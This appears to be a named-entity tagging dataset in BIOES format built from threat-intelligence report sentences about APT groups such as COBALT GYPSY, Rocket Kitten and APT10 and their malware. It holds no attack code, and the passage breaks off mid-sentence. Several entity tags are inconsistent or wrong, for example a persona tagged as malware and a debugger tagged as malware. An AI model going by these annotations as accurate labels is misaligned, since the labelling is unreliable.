+analysis O
+revealed O
+a O
+well-established O
+collection O
+of O
+fake O
+social B-IDTY
+media E-IDTY
+profiles O
+that O
+appear O
+intended O
+to O
+build O
+trust O
+and O
+rapport O
+with O
+potential O
+victims O
+. O
+
+COBALT B-APT
+GYPSY E-APT
+has O
+used O
+spearphishing S-ACT
+to O
+target O
+telecommunications S-IDTY
+, O
+government S-IDTY
+, O
+defense S-IDTY
+, O
+oil S-IDTY
+, O
+and O
+financial B-IDTY
+services I-IDTY
+organizations E-IDTY
+based O
+in O
+or O
+affiliated O
+with O
+the O
+MENA S-LOC
+region O
+, O
+identifying O
+individual B-IDTY
+victims E-IDTY
+through O
+social B-IDTY
+media E-IDTY
+sites O
+. O
+
+The O
+connections O
+associated O
+with O
+these O
+profiles O
+indicate O
+the O
+threat O
+actor O
+began O
+using O
+the O
+persona O
+to O
+target O
+organizations O
+in O
+April B-TIME
+2016 E-TIME
+. O
+
+Between O
+December B-TIME
+28 I-TIME
+, I-TIME
+2016 E-TIME
+and O
+January B-TIME
+1 I-TIME
+, I-TIME
+2017 E-TIME
+, O
+CTU S-SECTEAM
+researchers O
+observed O
+a O
+phishing B-ACT
+campaign E-ACT
+targeting O
+Middle B-LOC
+Eastern E-LOC
+organizations O
+. O
+
+The O
+macro O
+ran O
+a O
+PowerShell B-MAL
+command E-MAL
+that O
+attempted O
+to O
+download O
+additional O
+PowerShell S-TOOL
+loader O
+scripts O
+for O
+PupyRAT S-MAL
+, O
+a O
+research B-MAL
+and I-MAL
+penetration-testing I-MAL
+tool E-MAL
+that O
+has O
+been O
+used O
+in O
+attacks O
+. O
+
+The O
+survey O
+contained O
+macros O
+that O
+, O
+once O
+enabled O
+, O
+downloaded O
+PupyRAT S-MAL
+. O
+
+CTU S-SECTEAM
+researchers O
+determined O
+that O
+the O
+COBALT B-APT
+GYPSY E-APT
+threat O
+group O
+orchestrated O
+this O
+activity O
+due O
+to O
+the O
+tools O
+, O
+techniques O
+, O
+and O
+procedures O
+( O
+TTPs O
+) O
+used O
+in O
+both O
+campaigns S-ACT
+. O
+
+The O
+Magic O
+Hound O
+has O
+repeatedly O
+used O
+social B-IDTY
+media E-IDTY
+to O
+identify O
+and O
+interact O
+with O
+employees S-IDTY
+at O
+targeted O
+organizations O
+and O
+then O
+used O
+weaponized O
+Excel B-ACT
+documents E-ACT
+. O
+
+The O
+group O
+has O
+repeatedly O
+used O
+social B-IDTY
+media E-IDTY
+, O
+particularly O
+LinkedIn O
+, O
+to O
+identify O
+and O
+interact O
+with O
+employees O
+at O
+targeted O
+organizations O
+, O
+and O
+then O
+used O
+weaponized O
+Excel B-ACT
+documents E-ACT
+to O
+deliver O
+RATs S-MAL
+such O
+as O
+PupyRAT S-MAL
+. O
+
+By O
+compromising B-ACT
+a I-ACT
+user I-ACT
+account E-ACT
+that O
+has O
+administrative O
+or O
+elevated O
+access O
+, O
+Magic O
+Hound O
+can O
+quickly O
+access O
+a O
+targeted O
+environment O
+to O
+achieve O
+their O
+objectives O
+. O
+
+These O
+characteristics O
+suggest O
+that O
+COBALT B-APT
+GYPSY E-APT
+executed O
+the O
+January S-TIME
+and O
+February S-TIME
+phishing B-ACT
+campaigns E-ACT
+and O
+that O
+it O
+created O
+the O
+Mia B-APT
+Ash E-APT
+persona O
+. O
+
+CTU S-SECTEAM
+researchers O
+have O
+observed O
+multiple O
+COBALT B-ACT
+GYPSY I-ACT
+campaigns E-ACT
+since O
+2015 S-TIME
+and O
+consider O
+it O
+highly O
+likely O
+that O
+the O
+group O
+is O
+associated O
+with O
+Iranian S-LOC
+government-directed O
+cyber O
+operations O
+. O
+
+The O
+use O
+of O
+the O
+Mia B-MAL
+Ash E-MAL
+persona O
+demonstrates O
+the O
+creativity O
+and O
+persistence O
+that O
+threat O
+actors S-APT
+employ O
+to O
+compromise O
+targets O
+. O
+
+CTU S-SECTEAM
+researchers O
+conclude O
+that O
+COBALT B-APT
+GYPSY E-APT
+created O
+the O
+persona O
+to O
+gain O
+unauthorized O
+access O
+to O
+targeted O
+computer O
+networks O
+via O
+social B-IDTY
+engineering E-IDTY
+. O
+
+The O
+persistent O
+use O
+of O
+social B-IDTY
+media E-IDTY
+to O
+identify O
+and O
+manipulate O
+victims O
+indicates O
+that O
+COBALT B-APT
+GYPSY E-APT
+successfully O
+achieves O
+its O
+objectives O
+using O
+this O
+tactic O
+. O
+
+COBALT B-APT
+GYPSY E-APT
+'s O
+continued O
+social B-IDTY
+media E-IDTY
+use O
+reinforces O
+the O
+importance O
+of O
+recurring O
+social B-IDTY
+engineering E-IDTY
+training O
+. O
+
+SecureWorks B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+researchers O
+analyzed O
+a O
+phishing B-ACT
+campaign E-ACT
+that O
+targeted O
+a O
+Middle B-LOC
+Eastern E-LOC
+organization S-IDTY
+in O
+early B-TIME
+January I-TIME
+2017 E-TIME
+. O
+
+SecureWorks® B-SECTEAM
+Counter I-SECTEAM
+Threat I-SECTEAM
+Unit™ E-SECTEAM
+( O
+CTU S-SECTEAM
+) O
+researchers O
+analyzed O
+a O
+phishing B-ACT
+campaign E-ACT
+that O
+targeted O
+a O
+Middle B-LOC
+Eastern E-LOC
+organization S-IDTY
+in O
+early B-TIME
+January I-TIME
+2017 E-TIME
+. O
+
+CTU S-SECTEAM
+analysis O
+suggests O
+this O
+activity O
+is O
+related O
+to O
+Iranian S-LOC
+threat O
+actors S-APT
+closely O
+aligned O
+with O
+or O
+acting O
+on O
+behalf O
+of O
+the O
+COBALT B-APT
+GYPSY E-APT
+threat O
+group O
+( O
+formerly O
+labeled O
+Threat B-APT
+Group-2889 E-APT
+) O
+. O
+
+Since O
+early B-TIME
+2014 E-TIME
+, O
+an O
+attacker O
+group O
+of O
+Iranian S-LOC
+origin O
+has O
+been O
+actively O
+targeting O
+persons O
+of O
+interest O
+by O
+means O
+of O
+malware O
+infection O
+, O
+supported O
+by O
+persistent O
+spear B-ACT
+phishing I-ACT
+campaigns E-ACT
+. O
+
+This O
+cyber-espionage S-ACT
+group O
+was O
+dubbed O
+' O
+Rocket B-APT
+Kitten E-APT
+' O
+, O
+and O
+remains O
+active O
+as O
+of O
+this O
+writing O
+, O
+with O
+reported O
+attacks O
+as O
+recent O
+as O
+October B-TIME
+2015 E-TIME
+. O
+
+Characterized O
+by O
+relatively O
+unsophisticated B-MAL
+technical I-MAL
+merit E-MAL
+and O
+extensive O
+use O
+of O
+spear B-ACT
+phishing E-ACT
+, O
+the O
+Magic O
+Hound O
+targeted O
+individuals O
+and O
+organizations O
+in O
+the O
+Middle B-LOC
+East E-LOC
+( O
+including O
+targets O
+inside O
+Iran S-LOC
+itself O
+) O
+, O
+as O
+well O
+as O
+across O
+Europe S-LOC
+and O
+in O
+the O
+United B-LOC
+States E-LOC
+. O
+
+The O
+May B-TIME
+2014 E-TIME
+' O
+Operation B-ACT
+Saffron I-ACT
+Rose E-ACT
+' O
+publication O
+identifies O
+an O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+' O
+Ajax B-APT
+Security E-APT
+' O
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+An O
+Iranian S-LOC
+hacking O
+group O
+formerly O
+named O
+Ajax B-APT
+Security E-APT
+( O
+code-named O
+' O
+Flying B-APT
+Kitten E-APT
+' O
+by O
+CrowdStrike S-SECTEAM
+) O
+engaged O
+in O
+active O
+spear B-ACT
+phishing I-ACT
+attacks E-ACT
+on O
+Iranian S-LOC
+dissidents S-IDTY
+( O
+those O
+attempting O
+to O
+circumvent O
+government O
+traffic O
+monitoring O
+) O
+. O
+
+The O
+report O
+specifies O
+the O
+Magic O
+Hound O
+targeted O
+political S-IDTY
+, O
+military S-IDTY
+and O
+defense B-IDTY
+industry E-IDTY
+in O
+the O
+US S-LOC
+, O
+UK S-LOC
+and O
+Israel S-LOC
+. O
+
+ClearSky S-SECTEAM
+'s O
+September B-TIME
+2014 E-TIME
+blog O
+post O
+first O
+described O
+active O
+attacks O
+using O
+a O
+piece O
+of O
+malware O
+they O
+dubbed O
+' O
+Gholee S-MAL
+' O
+( O
+as O
+appears O
+in O
+a O
+malicious O
+payload O
+export O
+function O
+, O
+potentially O
+named O
+after O
+a O
+popular O
+Iranian S-LOC
+singer9 O
+) O
+. O
+
+The O
+Rocket B-APT
+Kitten E-APT
+attacker O
+group O
+'s O
+main O
+attack O
+vector O
+is O
+spear-phishing S-ACT
+. O
+
+After O
+learning O
+of O
+an O
+active O
+attack O
+incident O
+from O
+the O
+Rocket B-APT
+Kitten I-APT
+group E-APT
+on O
+a O
+customer O
+network O
+, O
+Check B-SECTEAM
+Point E-SECTEAM
+researchers O
+decided O
+to O
+actively O
+join O
+the O
+investigation O
+. O
+
+As O
+described O
+in O
+previous O
+publications O
+, O
+the O
+Rocket B-APT
+Kitten E-APT
+attackers S-APT
+make O
+extensive O
+use O
+of O
+various O
+phishing S-ACT
+schemes O
+. O
+
+While O
+the O
+recent O
+paper O
+from O
+Trend B-SECTEAM
+Micro E-SECTEAM
+and O
+ClearSky S-SECTEAM
+( O
+' O
+The O
+Spy B-APT
+Kittens E-APT
+Are O
+Back O
+: O
+Rocket B-APT
+Kitten E-APT
+2 O
+' O
+) O
+does O
+extensively O
+cover O
+the O
+campaign O
+'s O
+narrative O
+, O
+we O
+aimed O
+to O
+seek O
+confirmation O
+that O
+our O
+analyzed O
+attack O
+was O
+positively O
+connected O
+to O
+the O
+same O
+campaign O
+and O
+set O
+out O
+to O
+provide O
+additional O
+value O
+and O
+insight O
+. O
+
+As O
+the O
+Rocket B-APT
+Kitten I-APT
+group E-APT
+'s O
+behavior O
+was O
+well O
+characterized O
+in O
+previous O
+publications O
+( O
+see O
+the O
+recent O
+report O
+from O
+Trend B-SECTEAM
+Micro E-SECTEAM
+and O
+ClearSky S-SECTEAM
+) O
+. O
+
+Magic O
+Hound O
+will O
+often O
+find O
+simpler O
+ACTs O
+for O
+effective O
+compromise O
+, O
+such O
+as O
+creative O
+phishing S-ACT
+and O
+simple O
+custom B-ACT
+malware E-ACT
+. O
+
+We O
+present O
+the O
+connection O
+between O
+Behzad B-APT
+Mesri E-APT
+, O
+an O
+Iranian S-LOC
+national O
+recently O
+indicted O
+for O
+his O
+involvement O
+in O
+hacking O
+HBO O
+, O
+and O
+Charming B-APT
+Kitten E-APT
+. O
+
+Sometimes O
+, O
+they O
+aim O
+at O
+establishing O
+a O
+foothold O
+on O
+the O
+target O
+'s O
+computer O
+to O
+gain O
+access O
+into O
+their O
+organization O
+, O
+but O
+, O
+based O
+on O
+our O
+data O
+, O
+this O
+is O
+usually O
+not O
+their O
+main O
+objective O
+, O
+as O
+opposed O
+to O
+other O
+Iranian S-LOC
+threat B-APT
+groups E-APT
+, O
+such O
+as O
+Oilrig1 S-APT
+and O
+CopyKittens2 S-APT
+. O
+
+A O
+case O
+of O
+these O
+obscure O
+lines O
+can O
+be O
+found O
+in O
+a O
+blogpost O
+published O
+in O
+coordination O
+and O
+parallel O
+to O
+this O
+report O
+- O
+" O
+Flying B-APT
+Kitten E-APT
+to O
+Rocket B-APT
+Kitten E-APT
+, O
+A O
+Case O
+of O
+Ambiguity O
+and O
+Shared O
+Code O
+" O
+3 O
+by O
+Collin O
+Anderson O
+and O
+Claudio O
+Guarnieri O
+. O
+
+FireEye S-SECTEAM
+'s O
+publication O
+of O
+" O
+Operation B-ACT
+Saffron I-ACT
+Rose E-ACT
+" O
+report O
+, O
+which O
+described O
+Flying B-APT
+Kitten E-APT
+'s O
+operations O
+against O
+aviation B-IDTY
+firms E-IDTY
+, O
+led O
+to O
+the O
+dismantling O
+of O
+Flying B-APT
+Kitten E-APT
+'s O
+infrastructure O
+and O
+the O
+apparent O
+end O
+of O
+its O
+activities S-ACT
+. O
+
+To O
+sum O
+up O
+, O
+the O
+HBO O
+hacker S-APT
+- O
+Behzad B-APT
+Mesri E-APT
+is O
+a O
+member O
+of O
+Turk B-APT
+Black I-APT
+Hat E-APT
+along O
+with O
+ArYaIeIrAn S-APT
+, O
+who O
+provides O
+infrastructure O
+for O
+Charming B-ACT
+Kitten I-ACT
+activity E-ACT
+via O
+PersianDNS S-MAL
+/ O
+Mahanserver S-MAL
+together O
+with O
+Mohammad O
+Rasoul O
+Akbari O
+, O
+who O
+is O
+a O
+Facebook S-IDTY
+friend O
+of O
+Behzad B-APT
+Mesri E-APT
+'s O
+. O
+
+Charming B-APT
+kitten E-APT
+regularly O
+target O
+international O
+media S-IDTY
+outlets O
+with O
+Persian-language O
+services O
+. O
+
+It O
+was O
+a O
+decoy O
+to O
+make O
+visitor O
+download O
+a O
+" O
+Flash S-TOOL
+Player O
+" O
+, O
+which O
+was O
+in O
+fact O
+DownPaper S-MAL
+malware S-MAL
+, O
+analyzed O
+later O
+in O
+this O
+report O
+. O
+
+In O
+addition O
+to O
+using O
+PlugX S-MAL
+and O
+Poison B-MAL
+Ivy E-MAL
+( O
+PIVY S-MAL
+) O
+, O
+both O
+known O
+to O
+be O
+used O
+by O
+the O
+group O
+, O
+they O
+also O
+used O
+a O
+new O
+Trojan S-MAL
+called O
+" O
+ChChes S-MAL
+" O
+by O
+the O
+Japan B-SECTEAM
+Computer I-SECTEAM
+Emergency I-SECTEAM
+Response I-SECTEAM
+Team I-SECTEAM
+Coordination I-SECTEAM
+Center E-SECTEAM
+( O
+JPCERT S-SECTEAM
+) O
+. O
+
+Wapack S-SECTEAM
+labs O
+also O
+observed O
+a O
+similar O
+sample O
+targeting O
+Japan S-LOC
+in O
+November S-TIME
+. O
+
+MenuPass S-APT
+spoofed O
+several O
+sender O
+email S-ACT
+addresses O
+to O
+send O
+spear B-ACT
+phishing E-ACT
+emails S-TOOL
+, O
+most O
+notably O
+public O
+addresses O
+associated O
+with O
+the O
+Sasakawa B-IDTY
+Peace I-IDTY
+Foundation E-IDTY
+and O
+The O
+White B-IDTY
+House E-IDTY
+. O
+
+menuPass O
+typically O
+makes O
+use O
+of O
+a O
+mix O
+of O
+DDNS B-MAL
+and I-MAL
+actor-registered I-MAL
+domains E-MAL
+in O
+their O
+attack B-ACT
+campaigns E-ACT
+. O
+
+There O
+is O
+not O
+much O
+public O
+information O
+about O
+the O
+APT B-ACT
+campaign E-ACT
+called O
+menuPass S-APT
+( O
+also O
+known O
+as O
+Stone B-APT
+Panda E-APT
+and O
+APT10 S-APT
+) O
+. O
+
+A O
+paper O
+from O
+FireEye S-SECTEAM
+in O
+2013 S-TIME
+on O
+several O
+campaigns S-ACT
+using O
+PIVY S-MAL
+included O
+menuPass O
+as O
+one O
+of O
+them O
+. O
+
+Believed O
+to O
+have O
+started O
+activity O
+in O
+2009 S-TIME
+and O
+to O
+originate O
+from O
+China S-LOC
+, O
+the O
+group O
+initially O
+was O
+known O
+for O
+targeting O
+US S-LOC
+and O
+overseas O
+defense B-IDTY
+contractors E-IDTY
+but O
+broadened O
+their O
+targeting O
+as O
+time O
+passed O
+. O
+
+menuPass O
+has O
+targeted O
+individuals O
+and O
+organizations O
+in O
+Japan S-LOC
+since O
+at O
+least O
+2014 S-TIME
+, O
+and O
+as O
+the O
+same O
+organizations O
+and O
+academics O
+were O
+largely O
+targeted O
+each O
+month O
+in O
+these O
+attacks O
+, O
+it O
+further O
+shows O
+menuPass O
+is O
+persistent O
+in O
+attempts O
+to O
+compromise O
+their O
+targets O
+. O
+
+menuPass O
+also O
+heavily O
+favors O
+spear B-ACT
+phishing E-ACT
+, O
+and O
+so O
+takes O
+steps O
+to O
+socially O
+engineer O
+their O
+spear B-ACT
+phishes E-ACT
+for O
+maximum O
+appearance O
+of O
+legitimacy O
+. O
+
+menuPass O
+is O
+an O
+ongoing O
+APT B-ACT
+campaign E-ACT
+with O
+a O
+broad O
+range O
+of O
+targets O
+and O
+will O
+likely O
+continue O
+to O
+target O
+Japan S-LOC
+in O
+the O
+future O
+. O
+
+ChopShop1 S-FILE
+is O
+a O
+new O
+framework O
+developed O
+by O
+the O
+MITRE B-IDTY
+Corporation E-IDTY
+for O
+network-based O
+protocol O
+decoders O
+that O
+enable O
+security O
+professionals O
+to O
+understand O
+actual O
+commands O
+issued O
+by O
+human O
+operators O
+controlling O
+endpoints O
+. O
+
+PyCommands O
+, O
+meanwhile O
+, O
+are O
+Python S-TOOL
+scripts O
+that O
+automate O
+tasks O
+for O
+Immunity B-MAL
+Debugger E-MAL
+, O
+a O
+popular O
+tool O
+for O
+reverse-engineering O
+malware O
+binaries O
+. O
+
+Poison B-MAL
+Ivy E-MAL
+is O
+a O
+remote O
+access O
+tool O
+that O
+is O
+freely O
+available O
+for O
+download O
+from O
+its O
+official O
+web O
+site O
+at O
+www.poisonivy-rat.com S-DOM
+. O
+
+First O
+released O
+in O
+2005 S-TIME
+, O
+the O
+tool O
+has O
+gone O
+unchanged O
+since O
+2008 S-TIME
+with O
+v O
+ersion O
+2.3.2 O
+. O
+
+Poison B-MAL
+Ivy E-MAL
+includes O
+features O
+common O
+to O
+most O
+Windows-based S-OS
+RATs S-MAL
+, O
+including O
+key O
+logging O
+, O
+screen O
+capturing O
+, O
+video O
+capturing O
+, O
+file O
+transfers O
+, O
+system O
+administration O
+, O
+password O
+theft O
+, O
+and O
+traffic O
+relaying O
+. O
+
+APT40 S-APT
+was O
+previously O
+reported O
+as O
+TEMP.Periscope S-APT
+and O
+TEMP.Jumper S-APT
+. O
+
+They O
+move O
+laterally O
+and O
+escalate O
+system O
+privileges O
+to O
+extract O
+sensitive O
+information O
+— O
+whenever O
+the O
+attacker S-APT
+wants O
+to O
+do O
+so.4 O
+,5 O
+Because O
+some O
+RATs S-MAL
+used O
+in O
+targeted B-ACT
+attacks E-ACT
+are O
+widely O
+available O
+, O
+determining O
+whether O
+an O
+attack O
+is O
+part O
+of O
+a O
+broader O
+APT B-ACT
+campaign E-ACT
+can O
+be O
+difficult O
+. O
+
+In O
+2011 S-TIME
+, O
+three O
+years O
+after O
+the O
+most O
+recent O
+release O
+of O
+PIVY S-MAL
+, O
+attackers S-APT
+used O
+the O
+RAT S-MAL
+to O
+compromise O
+security B-IDTY
+firm I-IDTY
+RSA E-IDTY
+and O
+steal O
+data O
+about O
+its O
+SecureID O
+authentication O
+system O
+. O
+
+PIVY S-MAL
+also O
+played O
+a O
+key O
+role O
+in O
+the O
+2011 B-ACT
+campaign E-ACT
+known O
+as O
+Nitro O
+that O
+targeted O
+chemical B-IDTY
+makers E-IDTY
+, O
+government B-IDTY
+agencies E-IDTY
+, O
+defense B-IDTY
+contractors E-IDTY
+, O
+and O
+human O
+rights O
+groups.10,11 O
+Still O
+active O
+a O
+year O
+later O
+, O
+the O
+Nitro O
+attackers S-APT
+used O
+a O
+zero-day S-VULNAME
+vulnerability O
+in O
+Java O
+to O
+deploy O
+PIVY S-MAL
+in O
+2012 S-TIME
+. O
+
+Just O
+recently O
+, O
+PIVY S-MAL
+was O
+the O
+payload O
+of O
+a O
+zero-day S-VULNAME
+exploit S-VULNAME
+in O
+Internet O
+Explorer O
+used O
+in O
+what O
+is O
+known O
+as O
+a O
+" O
+strategic B-ACT
+web I-ACT
+compromise E-ACT
+" O
+attack O
+against O
+visitors O
+to O
+a O
+U.S. S-LOC
+government O
+website O
+and O
+a O
+variety O
+of O
+others O
+. O
+
+The O
+Poison B-MAL
+Ivy E-MAL
+builder O
+kit O
+allows O
+attackers S-APT
+to O
+customize O
+and O
+build O
+their O
+own O
+PIVY O
+server O
+, O
+which O
+is O
+delivered O
+as O
+mobile O
+code O
+to O
+a O
+target O
+that O
+has O
+been O
+compromised O
+, O
+typically O
+using O
+social B-IDTY
+engineering E-IDTY
+. O
+
+Attackers S-APT
+can O
+point O
+and O
+click O
+their O
+ACT O
+through O
+a O
+compromised O
+network O
+and O
+exfiltrate O
+data O
+. O
+
+Commodity O
+RATs S-MAL
+also O
+complicate O
+efforts O
+by O
+security O
+professionals O
+to O
+correlate O
+a O
+threat O
+actor O
+'s O
+activity O
+over O
+time—attackers O
+can O
+hide O
+in O
+the O
+sea O
+of O
+malicious B-ACT
+activity E-ACT
+that O
+also O
+uses O
+Poison B-MAL
+Ivy-based I-MAL
+malware E-MAL
+. O
+
+This O
+report O
+is O
+an O
+initial O
+public O
+release O
+of O
+research O
+PwC B-SECTEAM
+UK E-SECTEAM
+and O
+BAE B-SECTEAM
+Systems E-SECTEAM
+have O
+conducted O
+into O
+new O
+, O
+sustained O
+global O
+campaigns S-ACT
+by O
+an O
+established O
+threat O
+actor O
+against O
+managed B-IDTY
+IT I-IDTY
+service I-IDTY
+providers E-IDTY
+and O
+their O
+clients O
+as O
+well O
+as O
+several O
+directly O
+targeted O
+organisations O
+in O
+Japan S-LOC
+. O
+
+Since O
+late B-TIME
+2016 E-TIME
+, O
+PwC B-SECTEAM
+UK E-SECTEAM
+and O
+BAE B-SECTEAM
+Systems E-SECTEAM
+have O
+been O
+assisting O
+victims O
+of O
+a O
+new O
+cyber B-ACT
+espionage I-ACT
+campaign E-ACT
+conducted O
+by O
+APT10 S-APT
+. O
+
+The O
+campaign O
+, O
+which O
+we O
+refer O
+to O
+as O
+Operation B-ACT
+Cloud I-ACT
+Hopper E-ACT
+, O
+has O
+targeted O
+managed B-IDTY
+IT I-IDTY
+service I-IDTY
+providers E-IDTY
+( O
+MSPs S-IDTY
+) O
+, O
+allowing O
+APT10 S-APT
+unprecedented O
+potential O
+access O
+to O
+the O
+intellectual O
+property O
+and O
+sensitive O
+data O
+of O
+those O
+MSPs S-IDTY
+and O
+their O
+clients O
+globally O
+. O
+
+APT10 S-APT
+ceased O
+its O
+use O
+of O
+the O
+Poison B-MAL
+Ivy I-MAL
+malware I-MAL
+family E-MAL
+after O
+a O
+2013 O
+FireEye S-SECTEAM
+report O
+, O
+which O
+comprehensively O
+detailed O
+the O
+malware O
+'s O
+functionality O
+and O
+features O
+, O
+and O
+its O
+use O
+by O
+several O
+China-based S-LOC
+threat O
+actors S-APT
+, O
+including O
+APT10 S-APT
+. O
+
+APT10 S-APT
+primarily O
+used O
+PlugX S-MAL
+malware S-MAL
+from O
+2014 S-TIME
+to O
+2016 S-TIME
+, O
+progressively O
+improving O
+and O
+deploying O
+newer O
+versions O
+, O
+while O
+simultaneously O
+standardising O
+their O
+command O
+and O
+control O
+function O
+. O
+
+PwC B-SECTEAM
+UK E-SECTEAM
+and O
+BAE B-SECTEAM
+Systems E-SECTEAM
+assess O
+it O
+is O
+highly O
+likely O
+that O
+APT10 S-APT
+is O
+a O
+China-based S-LOC
+threat O
+actor O
+with O
+a O
+focus O
+on O
+espionage S-ACT
+and O
+wide O
+ranging O
+information O
+collection O
+. O
+
+APT10 S-APT
+is O
+known O
+to O
+have O
+exfiltrated O
+a O
+high O
+volume O
+of O
+data O
+from O
+multiple O
+victims O
+, O
+exploiting O
+compromised O
+MSP B-MAL
+networks E-MAL
+, O
+and O
+those O
+of O
+their O
+customers S-IDTY
+, O
+to O
+stealthily O
+move O
+this O
+data O
+around O
+the O
+world O
+. O
+
+APT10 S-APT
+, O
+a O
+name O
+originally O
+coined O
+by O
+FireEye S-SECTEAM
+, O
+is O
+also O
+referred O
+to O
+as O
+Red B-APT
+Apollo E-APT
+by O
+PwC B-SECTEAM
+UK E-SECTEAM
+, O
+CVNX S-APT
+by O
+BAE B-SECTEAM
+Systems E-SECTEAM
+, O
+Stone B-APT
+Panda E-APT
+by O
+CrowdStrike S-SECTEAM
+, O
+and O
+menuPass B-APT
+Team E-APT
+more O
+broadly O
+in O
+the O
+public O
+domain O
+. O
+
+The O
+threat O
+actor O
+has O
+previously O
+been O
+the O
+subject O
+of O
+a O
+range O
+of O
+open O
+source O
+reporting O
+, O
+including O
+most O
+notably O
+a O
+report O
+by O
+FireEye S-SECTEAM
+comprehensively O
+detailing O
+the O
+threat O
+actor O
+'s O
+use O
+of O
+the O
+Poison B-MAL
+Ivy I-MAL
+malware I-MAL
+family E-MAL
+and O
+blog O
+posts O
+by O
+Trend B-SECTEAM
+Micro3 E-SECTEAM
+similarly O
+detailing O
+the O
+use O
+of O
+EvilGrab S-MAL
+malware S-MAL
+. O
+
+The O
+threat O
+actor O
+has O
+previously O
+been O
+the O
+subject O
+of O
+a O
+range O
+of O
+open O
+source O
+reporting O
+, O
+including O
+most O
+notably O
+a O
+report O
+by O
+FireEye S-SECTEAM
+comprehensively O
+detailing O
+the O
+threat O
+actor O
+'s O
+use O
+of O
+the O
+Poison B-MAL
+Ivy I-MAL
+malware I-MAL
+family E-MAL
+and O
+blog O
+posts O
+by O
+Trend B-SECTEAM
+Micro E-SECTEAM
+similarly O
+detailing O
+the O
+use O
+of O
+EvilGrab S-MAL
+malware S-MAL
+. O
+
+APT10 S-APT
+has O
+been O
+in O
+operation O
+since O
+at O
+least O
+2009 S-TIME
+, O
+and O
+has O
+evolved O
+its O
+targeting O
+from O
+an O
+early O
+focus O
+on O
+the O
+US S-LOC
+defence O
+industrial O
+base O
+( O
+DIB O
+)1 O
+and O
+the O
+technology S-IDTY
+and O
+telecommunications B-IDTY
+sector E-IDTY
+, O
+to O
+a O
+widespread O
+compromise O
+of O
+multiple O
+industries O
+and O
+sectors O
+across O
+the O
+globe O
+, O
+most O
+recently O
+with O
+a O
+focus O
+on O
+MSPs S-IDTY
+. O
+
+The O
+research O
+and O
+ongoing O
+tracking O
+of O
+APT10 S-APT
+by O
+both O
+PwC B-SECTEAM
+UK E-SECTEAM
+and O
+BAE S-SECTEAM
+. O
+
+APT10 S-APT
+has O
+been O
+in O
+operation O
+since O
+at O
+least O
+2009 S-TIME
+, O
+and O
+has O
+evolved O
+its O
+targeting O
+from O
+an O
+early O
+focus O
+on O
+the O
+US S-LOC
+defence O
+industrial O
+base O
+( O
+DIB O
+) O
+and O
+the O
+technology S-IDTY
+and O
+telecommunications B-IDTY
+sector E-IDTY
+, O
+to O
+a O
+widespread O
+compromise O
+of O
+multiple O
+industries O
+and O
+sectors O
+across O
+the O
+globe O
+, O
+most O
+recently O
+with O
+a O
+focus O
+on O
+MSPs S-IDTY
+. O
+
+PwC B-SECTEAM
+UK E-SECTEAM
+has O
+been O
+engaged O
+in O
+supporting O
+investigations O
+linked O
+to O
+APT10 S-APT
+compromises O
+. O
+
+As O
+a O
+result O
+of O
+our O
+analysis O
+of O
+APT10 S-APT
+'s O
+activities S-ACT
+, O
+we O
+believe O
+that O
+it O
+almost O
+certainly O
+benefits O
+from O
+significant O
+staffing O
+and O
+logistical O
+resources O
+, O
+which O
+have O
+increased O
+over O
+the O
+last O
+three O
+years O
+, O
+with O
+a O
+significant O
+step-change O
+in O
+2016 S-TIME
+. O
+
+Due O
+to O
+the O
+scale O
+of O
+the O
+threat O
+actor O
+'s O
+operations O
+throughout O
+2016 S-TIME
+and O
+2017 S-TIME
+, O
+we O
+similarly O
+assess O
+it O
+currently O
+comprises O
+multiple O
+teams O
+, O
+each O
+responsible O
+for O
+a O
+different O
+section O
+of O
+the O
+day-to-day O
+operations O
+, O
+namely B-ACT
+domain I-ACT
+registration E-ACT
+, O
+infrastructure O
+management O
+, O
+malware O
+development O
+, O
+target O
+operations O
+, O
+and O
+analysis O
+. O
+
+APT10 S-APT
+withdrew O
+from O
+direct O
+targeting O
+using O
+Poison B-MAL
+Ivy E-MAL
+in O
+2013 S-TIME
+and O
+conducted O
+its O
+first O
+known O
+retooling O
+operation O
+, O
+upgrading O
+its O
+capabilities O
+and O
+replatforming O
+to O
+use O
+PlugX S-MAL
+. O
+
+It O
+is O
+highly O
+likely O
+that O
+this O
+is O
+due O
+to O
+the O
+release O
+of O
+the O
+2013 O
+FireEye S-SECTEAM
+report O
+. O
+
+Our O
+report O
+will O
+detail O
+the O
+most O
+recent O
+campaigns S-ACT
+conducted O
+by O
+APT10 S-APT
+, O
+including O
+the O
+sustained O
+targeting O
+of O
+MSPs S-IDTY
+, O
+which O
+we O
+have O
+named O
+Operation B-ACT
+Cloud I-ACT
+Hopper E-ACT
+, O
+and O
+the O
+targeting O
+of O
+a O
+number O
+of O
+Japanese S-LOC
+institutions S-IDTY
+. O
+
+MSPs S-IDTY
+therefore O
+represent O
+a O
+high-payoff O
+target O
+for O
+espionagefocused O
+threat O
+actors S-APT
+such O
+as O
+APT10 S-APT
+. O
+
+Given O
+the O
+level O
+of O
+client O
+network O
+access O
+MSPs S-IDTY
+have O
+, O
+once O
+APT10 S-APT
+has O
+gained O
+access O
+to O
+a O
+MSP S-MAL
+, O
+it O
+is O
+likely O
+to O
+be O
+relatively O
+straightforward O
+to O
+exploit S-VULNAME
+this O
+and O
+move O
+laterally O
+onto O
+the O
+networks O
+of O
+potentially O
+thousands O
+of O
+other O
+victims O
+. O
+
+This O
+, O
+in O
+turn O
+, O
+would O
+provide O
+access O
+to O
+a O
+larger O
+amount O
+of O
+intellectual O
+property O
+and O
+sensitive O
+data O
+. O
+
+APT10 S-APT
+has O
+been O
+observed O
+to O
+exfiltrate O
+stolen O
+intellectual O
+property O
+via O
+the O
+MSPs S-IDTY
+, O
+hence O
+evading O
+local O
+network O
+defences O
+. O
+
+The O
+command O
+and O
+control O
+( O
+C2 S-TOOL
+) O
+infrastructure O
+chosen O
+by O
+APT10 S-APT
+for O
+Operation B-ACT
+Cloud I-ACT
+Hopper E-ACT
+is O
+predominantly O
+referenced O
+using O
+dynamic-DNS B-MAL
+domains E-MAL
+. O
+
+Several O
+of O
+these O
+provide O
+enterprise O
+services O
+or O
